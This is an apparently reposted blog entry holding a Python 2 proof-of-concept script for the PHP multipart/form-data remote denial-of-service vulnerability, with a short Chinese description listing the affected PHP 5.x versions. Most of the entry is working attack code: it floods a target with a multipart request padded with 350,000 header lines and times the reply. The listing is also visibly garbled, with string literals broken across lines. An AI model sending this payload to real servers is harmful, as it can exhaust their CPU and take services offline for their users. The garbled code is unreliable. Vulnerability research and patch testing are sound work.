  • PHP multipart/form-data 远程DOS漏洞

    import sys
    import urllib,urllib2
    import datetime
    from optparse import OptionParser
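    def http_proxy(proxy_url):
        """Send all later urllib2 HTTP requests through *proxy_url*.

        The opener is installed process-wide with urllib2.install_opener, so
        every urllib2.urlopen call made after this one is affected. Only the
        "http" scheme is mapped; https requests are not routed through the
        proxy.

        Args:
            proxy_url: proxy address, e.g. "http://127.0.0.1:8089".
        """
        # The original also built an empty ProxyHandler({}) that was never
        # used; it has been dropped.
        proxy_handler = urllib2.ProxyHandler({"http": proxy_url})
        urllib2.install_opener(urllib2.build_opener(proxy_handler))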
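    def check_php_multipartform_dos(url,post_body,headers):
        """POST *post_body* to *url* and classify the target by response time.

        The verdict is a timing heuristic only: it measures whole seconds
        between sending the request and finishing the read of the response.
        A slow network or a busy server can produce a false positive, and a
        fast answer does not prove the server is patched, so the result
        should be compared with the target's normal response time.

        Args:
            url: address the request is sent to.
            post_body: request body, passed to urllib2.urlopen as POST data.
            headers: dict of header name -> value added to the request.

        Returns:
            [result, usetime], where result is a human-readable verdict
            string and usetime is the elapsed time in whole seconds.

        Raises:
            urllib2.URLError: propagated from urllib2.urlopen on connection
                or HTTP errors.
        """
        req = urllib2.Request(url)
        for key, value in headers.items():
            req.add_header(key, value)

        starttime = datetime.datetime.now()
        fd = urllib2.urlopen(req, post_body)
        try:
            # The body is read only so that the timer covers the complete
            # response; its content is not inspected.
            fd.read()
            endtime = datetime.datetime.now()
        finally:
            fd.close()

        usetime = (endtime - starttime).seconds
        if usetime > 5:
            result = url + " is vulnerable"
        elif usetime > 3:
            result = "need to check normal respond time"
        else:
            # The original left `result` unassigned on this path and raised
            # UnboundLocalError whenever the server answered within 3 seconds.
            result = url + " responded without noticeable delay"
        return [result, usetime]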
    def main():
        """Parse -t/--target, build the multipart test request and print the verdict.

        Returns None without printing anything when no target is given.
        The verdict and the elapsed seconds come from
        check_php_multipartform_dos.
        """
        # Optional: route the request through a local proxy (disabled here).
        #http_proxy("http://127.0.0.1:8089")
        parser = OptionParser()
        parser.add_option("-t", "--target", action="store",
                      dest="target",
                      default=False,
                      type="string",
                      help="test target")
        (options, args) = parser.parse_args()
        if(options.target):
            target = options.target
        else:
            # No target given: exit silently (no usage message is printed).
            return;
        # Number of filler lines appended to the part header by the loop below.
        Num=350000
        # NOTE(review): from here to the closing boundary the listing is not
        # valid Python as printed. String literals run across physical lines,
        # which suggests the page rendered the original newline escapes as
        # real line breaks and dropped the backslashes before the inner
        # quotes -- TODO confirm against the original source.
        headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
                'Accept-Encoding':'gzip, deflate',
                'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) 
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
    body = 
    "------WebKitFormBoundaryX3B7rDMPcQlzmJE1
    Content-Disposition: 
    form-data; name="file"; filename=sp.jpg"
        payload=""
        # Request shape a defender can key on: a single multipart part whose
        # header block is followed by Num extra short lines before the
        # Content-Type line and the blank line that ends the part headers.
        for i in range(0,Num):
            payload = payload + "a
    "
        body = body + payload;
    body = body + 
    "Content-Type: application/octet-stream
    
    datadata
    ------
    WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
        print "starting...";
        # Returns [verdict string, elapsed whole seconds].
        respond=check_php_multipartform_dos(target,body,headers)
        print "Result : "
        print respond[0]
        print "Respond time : "+str(respond[1]) + " seconds";
    # Run the check only when the file is executed as a script, not on import.
    if "__main__" == __name__:
        main()
    

      

    PHP 在处理HTTP请求中的multipart/form-data头部数据时存在一个安全漏洞,导致PHP大量重复分配和拷贝内存的操作,可能造成CPU资源占用100%并持续较长时间,这可能造成远程拒绝服务攻击。受影响的软件及系统:PHP 5.0.0 - 5.0.5;PHP 5.1.0 - 5.1.6;PHP 5.2.0 - 5.2.17;PHP 5.3.0 - 5.3.29;PHP 5.4.0 - 5.4.40;PHP 5.5.0 - 5.5.24;PHP 5.6.0 - 5.6.8

  • 原文地址:https://www.cnblogs.com/endust/p/11983902.html